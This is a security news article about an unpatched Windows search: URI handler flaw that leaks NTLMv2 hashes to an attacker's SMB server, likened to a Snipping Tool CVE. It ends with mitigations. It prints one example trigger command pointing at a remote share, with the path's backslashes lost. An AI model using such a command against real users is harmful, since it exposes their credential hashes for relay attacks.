Cybersecurity researchers have recently unveiled an unpatched vulnerability that poses a significant risk to user security by potentially exposing NTLMv2 hashes to attackers. This issue, reminiscent of the previously reported CVE-2026-33829, is linked to the search: URI handler, as identified by Huntress.
Details of the Vulnerability
CVE-2026-33829 was a spoofing vulnerability associated with the Windows Snipping Tool’s ms-screensketch: URI handler, which Microsoft addressed in April 2026. The advisory from Microsoft highlighted that an attacker could trick a user into clicking a malicious link embedded in a webpage or email. If the user consented to launch the link, their computer would connect to an SMB server controlled by the attacker, thereby disclosing the user’s NTLMv2 hash. This hash could then be exploited for authentication purposes.
The core of the vulnerability lies in the Snipping Tool’s URI handler, which accepted a “filePath” parameter without proper validation. This flaw allowed the handler to reach out to any Universal Naming Convention (UNC) path provided, triggering NTLM authentication and revealing the victim’s Net-NTLMv2 hash.
The newly identified vulnerability operates similarly, utilizing “search:” and “crumb=location:” instead of “filePath.” An example command illustrating this is:
start "" "search:query=test&crumb=location:10.0.1.100share"According to Huntress researcher Andrew Schwartz, this new issue employs the same NTLM leakage mechanism, resulting in an identical Net-NTLMv2 leak, sharing the same prerequisites and receiving a Moderate severity rating. Notably, the use of a “crumb” parameter to extract the hash was previously documented by Varonis in February 2024.
Potential Risks and Recommendations
The implications of this vulnerability are serious, as a threat actor could utilize the captured hash to execute relay attacks, thereby gaining unauthorized access to deeper network layers. Following a responsible disclosure on April 15, 2026, Microsoft opted not to address the issue, stating that only vulnerabilities classified as Important or Critical would warrant a fix.
In light of the absence of a patch, cybersecurity experts recommend several precautionary measures:
- Block outbound SMB traffic (TCP/445 and TCP/139) on hosts that do not require it.
- Enforce SMB signing to prevent captured hashes from being relayed against internal services.
- Disable NTLM authentication where feasible.
These steps can help mitigate the risks associated with this vulnerability until a formal resolution is provided.
